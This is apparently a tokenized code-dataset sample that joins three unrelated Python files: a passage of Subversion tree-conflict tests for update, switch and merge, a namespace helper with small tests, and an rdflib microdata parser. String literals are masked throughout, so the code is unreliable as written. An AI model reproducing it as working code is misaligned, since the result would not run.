DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , D , DD , DDD ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( D , "<STR_LIT>" ) <EOL> main . file_append ( DD , "<STR_LIT>" ) <EOL> main . file_append ( DDD , "<STR_LIT>" ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , D , DD , DDD ) <EOL> deep_trees_after_leaf_edit = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> } ) <EOL> def deep_trees_leaf_del ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . run_svn ( None , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL> deep_trees_after_leaf_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL> def deep_trees_after_leaf_del_no_ci ( wc_dir ) : <EOL> if svntest . main . wc_is_singledb ( wc_dir ) : <EOL> return deep_trees_after_leaf_del <EOL> else : <EOL> return deep_trees_empty_dirs <EOL> def deep_trees_tree_del ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . run_svn ( None , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL> def deep_trees_rmtree ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . unlink ( F ) <EOL> main . safe_rmtree ( D ) <EOL> main . safe_rmtree ( DF ) <EOL> main . safe_rmtree ( DD ) <EOL> main . safe_rmtree ( DDF ) <EOL> main . safe_rmtree ( DDD ) <EOL> deep_trees_after_tree_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL> deep_trees_empty_dirs = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL> def deep_trees_after_tree_del_no_ci ( wc_dir ) : <EOL> if svntest . main . wc_is_singledb ( wc_dir ) : <EOL> return deep_trees_after_tree_del <EOL> else : <EOL> return deep_trees_empty_dirs <EOL> def deep_trees_tree_del_repos ( base ) : <EOL> """<STR_LIT>""" <EOL> j = '<STR_LIT:/>' . join <EOL> F = j ( [ base , '<STR_LIT:F>' , '<STR_LIT>' ] ) <EOL> D = j ( [ base , '<STR_LIT:D>' , '<STR_LIT>' ] ) <EOL> DF = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DD = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DDF = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> DDD = j ( [ base , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , F , D , DF , DD , DDF , DDD ) <EOL> deep_trees_conflict_output = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL> deep_trees_conflict_output_skipped = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> deep_trees_status_local_tree_del = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT:D>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT:F>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL> deep_trees_status_local_leaf_edit = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT:D>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> ) , <EOL> '<STR_LIT:F>' : Item ( status = '<STR_LIT:U+0020>' , wc_rev = <NUM_LIT:3> ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' , wc_rev = <NUM_LIT:2> , treeconflict = '<STR_LIT:C>' ) , <EOL> } ) <EOL> class DeepTreesTestCase : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , local_action , incoming_action , <EOL> expected_output = None , expected_disk = None , <EOL> expected_status = None , expected_skip = None , <EOL> error_re_string = None , <EOL> commit_block_string = "<STR_LIT>" , <EOL> expected_info = None ) : <EOL> self . name = name <EOL> self . local_action = local_action <EOL> self . incoming_action = incoming_action <EOL> self . expected_output = expected_output <EOL> self . expected_disk = expected_disk <EOL> self . expected_status = expected_status <EOL> self . expected_skip = expected_skip <EOL> self . error_re_string = error_re_string <EOL> self . commit_block_string = commit_block_string <EOL> self . expected_info = expected_info <EOL> def deep_trees_run_tests_scheme_for_update ( sbox , greater_scheme ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> add_deep_trees ( sbox , test_case . name ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( wc_dir , test_case . name ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( wc_dir , test_case . name ) <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = base <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> run_and_verify_update ( base , x_out , x_disk , None , <EOL> error_re_string = test_case . error_re_string ) <EOL> if x_status : <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> x_info = test_case . expected_info or { } <EOL> for path in x_info : <EOL> run_and_verify_info ( [ x_info [ path ] ] , j ( base , path ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( wc_dir , test_case . name ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> run_and_verify_commit ( base , None , x_status , <EOL> test_case . commit_block_string , <EOL> base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> def deep_trees_skipping_on_update ( sbox , test_case , skip_paths , <EOL> chdir_skip_paths ) : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> further_action = deep_trees_tree_del_repos <EOL> j = os . path . join <EOL> wc_dir = sbox . wc_dir <EOL> base = j ( wc_dir , test_case . name ) <EOL> setup_case = DeepTreesTestCase ( test_case . name , <EOL> test_case . local_action , <EOL> test_case . incoming_action , <EOL> None , <EOL> None , <EOL> None ) <EOL> deep_trees_run_tests_scheme_for_update ( sbox , [ setup_case ] ) <EOL> further_action ( sbox . repo_url + '<STR_LIT:/>' + test_case . name ) <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = base <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status = x_status . copy ( ) <EOL> x_status . wc_dir = base <EOL> x_status . tweak ( '<STR_LIT>' , '<STR_LIT:D>' , '<STR_LIT:F>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_rev = <NUM_LIT:4> ) <EOL> run_and_verify_update ( base , x_out , x_disk , None , <EOL> error_re_string = test_case . error_re_string ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> for path in skip_paths : <EOL> run_and_verify_update ( j ( base , path ) , <EOL> wc . State ( base , { path : Item ( verb = '<STR_LIT>' ) } ) , <EOL> None , None ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> was_cwd = os . getcwd ( ) <EOL> for path , skipped in chdir_skip_paths : <EOL> if isinstance ( skipped , list ) : <EOL> expected_skip = { } <EOL> for p in skipped : <EOL> expected_skip [ p ] = Item ( verb = '<STR_LIT>' ) <EOL> else : <EOL> expected_skip = { skipped : Item ( verb = '<STR_LIT>' ) } <EOL> p = j ( base , path ) <EOL> run_and_verify_update ( p , <EOL> wc . State ( p , expected_skip ) , <EOL> None , None ) <EOL> os . chdir ( was_cwd ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> for path , skipped in chdir_skip_paths : <EOL> run_and_verify_commit ( j ( base , path ) , None , None , <EOL> test_case . commit_block_string , <EOL> base ) <EOL> run_and_verify_unquiet_status ( base , x_status ) <EOL> def deep_trees_run_tests_scheme_for_switch ( sbox , greater_scheme ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( sbox . wc_dir , test_case . name ) <EOL> os . makedirs ( base ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , "<STR_LIT>" ) <EOL> incoming = sbox . repo_url + "<STR_LIT:/>" + test_case . name + "<STR_LIT>" <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = local <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_switch ( local , local , incoming , x_out , x_disk , None , <EOL> test_case . error_re_string , None , None , None , <EOL> None , False , '<STR_LIT>' ) <EOL> run_and_verify_unquiet_status ( local , x_status ) <EOL> x_info = test_case . expected_info or { } <EOL> for path in x_info : <EOL> run_and_verify_info ( [ x_info [ path ] ] , j ( local , path ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , '<STR_LIT>' ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_commit ( local , None , x_status , <EOL> test_case . commit_block_string , <EOL> local ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> def deep_trees_run_tests_scheme_for_merge ( sbox , greater_scheme , <EOL> do_commit_local_changes , <EOL> do_commit_conflicts = True , <EOL> ignore_ancestry = False ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> if not sbox . is_built ( ) : <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base = j ( sbox . wc_dir , test_case . name ) <EOL> os . makedirs ( base ) <EOL> make_deep_trees ( j ( base , "<STR_LIT>" ) ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> for test_case in greater_scheme : <EOL> try : <EOL> base_url = sbox . repo_url + "<STR_LIT:/>" + test_case . name <EOL> incoming_url = base_url + "<STR_LIT>" <EOL> local_url = base_url + "<STR_LIT>" <EOL> main . run_svn ( None , '<STR_LIT>' , incoming_url , local_url , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . incoming_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if not do_commit_local_changes : <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> test_case . local_action ( j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if do_commit_local_changes : <EOL> try : <EOL> main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> sbox . wc_dir ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" ) <EOL> raise <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( sbox . wc_dir , test_case . name , "<STR_LIT>" ) <EOL> incoming = sbox . repo_url + "<STR_LIT:/>" + test_case . name + "<STR_LIT>" <EOL> x_out = test_case . expected_output <EOL> if x_out != None : <EOL> x_out = x_out . copy ( ) <EOL> x_out . wc_dir = local <EOL> x_disk = test_case . expected_disk <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> x_skip = test_case . expected_skip <EOL> if x_skip != None : <EOL> x_skip . copy ( ) <EOL> x_skip . wc_dir = local <EOL> varargs = ( local , ) <EOL> if ignore_ancestry : <EOL> varargs = varargs + ( '<STR_LIT>' , ) <EOL> run_and_verify_merge ( local , None , None , incoming , None , <EOL> x_out , None , None , x_disk , None , x_skip , <EOL> test_case . error_re_string , <EOL> None , None , None , None , <EOL> False , False , * varargs ) <EOL> run_and_verify_unquiet_status ( local , x_status ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise <EOL> if do_commit_conflicts : <EOL> for test_case in greater_scheme : <EOL> try : <EOL> local = j ( wc_dir , test_case . name , '<STR_LIT>' ) <EOL> x_status = test_case . expected_status <EOL> if x_status != None : <EOL> x_status . copy ( ) <EOL> x_status . wc_dir = local <EOL> run_and_verify_commit ( local , None , x_status , <EOL> test_case . commit_block_string , <EOL> local ) <EOL> except : <EOL> logger . warn ( "<STR_LIT>" <EOL> + "<STR_LIT>" , test_case . name ) <EOL> raise </s>
<s> '''<STR_LIT>''' <EOL> class PNwkNamespace ( object ) : <EOL> NAMESPACE_SEP = '<STR_LIT:$>' <EOL> def __init__ ( self , name = None ) : <EOL> if not name : name = '<STR_LIT>' <EOL> self . name = name <EOL> sep = self . NAMESPACE_SEP <EOL> self . client_name_space = self . make_namespace ( name ) <EOL> self . pnwkNameSpace = self . make_namespace ( name + '<STR_LIT>' ) <EOL> self . match_namespace = self . make_namespace ( '<STR_LIT>' ) <EOL> def make_namespace ( self , name ) : <EOL> return name + self . NAMESPACE_SEP <EOL> def add_namespace ( self , props , nameSpace ) : <EOL> if not props : return { } <EOL> out = { } <EOL> for key in props . keys ( ) : <EOL> out [ nameSpace + key ] = props [ key ] <EOL> return out <EOL> def split_off_namespace ( self , name ) : <EOL> i = name . find ( self . NAMESPACE_SEP ) + <NUM_LIT:1> <EOL> return ( name [ : i ] , name [ i : ] ) <EOL> def test_add_namespace ( nsp ) : <EOL> a = { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:3> } <EOL> ns = nsp . make_namespace ( '<STR_LIT>' ) <EOL> b = nsp . add_namespace ( a , ns ) <EOL> assert b [ '<STR_LIT>' + nsp . NAMESPACE_SEP + '<STR_LIT:name>' ] == <NUM_LIT:2> <EOL> def test_split_off_namespace ( nsp ) : <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT:bar>' <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT:bar>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT:bar>' <EOL> ( ns , base ) = nsp . split_off_namespace ( '<STR_LIT>' ) <EOL> assert ns == '<STR_LIT>' <EOL> assert base == '<STR_LIT>' <EOL> def test ( ) : <EOL> nsp = PNwkNamespace ( name = '<STR_LIT>' ) <EOL> test_add_namespace ( nsp ) <EOL> test_split_off_namespace ( nsp ) <EOL> print '<STR_LIT>' <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> import microdata <EOL> from rdflib import URIRef , Literal , BNode , Namespace , RDF <EOL> from rdflib . plugin import register <EOL> from rdflib . parser import Parser <EOL> register ( "<STR_LIT>" , Parser , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class MicrodataParser ( Parser ) : <EOL> def parse ( self , source , sink , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for item in microdata . get_items ( source . getByteStream ( ) ) : <EOL> self . _add_item ( item , sink ) <EOL> def _add_item ( self , item , sink ) : <EOL> if item . itemid : <EOL> s = URIRef ( item . itemid . string ) <EOL> else : <EOL> s = BNode ( ) <EOL> if not item . itemtype : <EOL> return <EOL> ns = str ( item . itemtype ) <EOL> if ns . endswith ( "<STR_LIT:#>" ) or ns . endswith ( "<STR_LIT:/>" ) : <EOL> ns = Namespace ( item . itemtype ) <EOL> else : <EOL> ns = Namespace ( ns + "<STR_LIT:#>" ) <EOL> sink . add ( ( s , RDF . type , URIRef ( item . itemtype ) ) ) <EOL> for item_property , item_values in item . props . items ( ) : <EOL> p = ns [ item_property ] <EOL> for v in item_values : <EOL> if isinstance ( v , microdata . Item ) : <EOL> o = self . _add_item ( v , sink ) <EOL> elif isinstance ( v , microdata . URI ) : <EOL> o = URIRef ( str ( v ) ) <EOL> else : <EOL> o = Literal ( v ) <EOL> sink . add ( ( s , p , o ) ) <EOL> return s </s>
